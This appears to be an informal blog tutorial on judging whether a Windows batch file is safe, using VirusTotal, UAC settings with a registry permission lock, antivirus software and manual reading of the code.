Before this Post, you have learned about batch files in previous tutorials. There are showed that batch files are safe. But really is it? Because some malicious peoples destroy PC using batch files. Because most of the antivirus didn't scan batch file properly or skip scanning batch file. But how a simple batch file destroys a PC? Sometimes batch files download unwanted files from the internet without user permission and run the program in the background (The program compressed into an archive file so the program hides its code in it) and it destroyed pc by slowly or too fast that user can't do anything after that. So let us see how to verify that the batch file is safe or not.
1. Use VirusTotal
VirusToal is a website where you can scan your file for free. Just upload the file into VirusTotal Server and wait a few times to view the report. Sometimes VirusTotal antiviruses detect the batch file as a virus and sometimes not because most of the Antivirus Publishers thought that, A Simple batch file can't harm any PC, but it is not real. The batch file can damage PC like an exe virus.
2. Enable UAC
What the combination between batch file and UAC? We know that UAC alerts you when we install any program into Computer. While installing, Programs copies its files into System folders (such as System32) and overwrite files or delete system files. So UAC Alerts you when you will changing into a system file. If you turn on UAC at maximum level, then If any batch file request Administrator Permission then you can prevent it to change system files. But it can modify user-created files from the desktop or Documents folder (Like a Ransome Virus). And more Safe Option is that lock UAC means You also wouldn't disable UAC.
How to Enable UAC?
Go to 'Control Panel' and Search for 'UAC' then Click on 'User Account Control' then Type your Administrator Password and Press 'Yes' button and Set the Switch to 'Always Notify' and Hit the OK button. You may need to manually type your password again.
How to lock UAC?
Open 'Regedit.exe' as Administrator and then go to 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' key and Right-click on the 'System' Key and choose 'Permission'. Click on Advanced and then click on 'Add'. Type 'everyone' in the box and hit the OK button. Set 'Apply to' as 'This key only' and Set Permissions like the below box.
| Allow | Deny |
Query Value | Yes | |
Set Value | | Yes |
Enumerate Subkey | Yes | |
Notify | Yes | |
Delete | | Yes |
Write DAC | | Yes |
Write Owner | | Yes |
Read Control | Yes | |
3. Use Antivirus
Antiviruses are awesome. They detect malicious programs into your PC and protects you by his (or her, If the antivirus made by a female programmer lol) Real-Time Protection. Also, sometime Antiviruses detects batch file. For this feature, you need to use up-to-date Antivirus (like Emisoft). Most Antiviruses detected malicious batch files using 'Behavior Sheild', It checks every program behavior and if it did something wrong then Antivirus sent it into Virus Chest or Delete it permanently.
4. View Codes
View codes of the Batch files to determine what it can do. You need to know a little bit about the batch file. If you don't know about batch file then you can learn batch file tutorials bu click here.
How to View the code of a batch file?
For viewing a batch file code you no need a specific software, you can open it using any text editor but I recommended you use Notepad++. Cuz it separates batch file codes using many colors and it is easy to customize, Just you need to right-click on the batch file and choose 'Edit with Notepad++'. If you don't want to use Notepad++ then you can open it using Windows Notepad, For opening, you need to right-click on a batch file and then 'edit'. If you fail to open it into notepad then you can open the file into notepad using the Open menu or using the shortcut key 'Ctrl+O'.
For solving this issue you can use Batch file Hunter
Batch file hunter is a program that detects malicious codes into a batch file and creates reports to help the user to determine that the batch file is safe or unsafe.
Download:
Currently Unavailable!
Check on My profile in Github to download Batch File Hunter.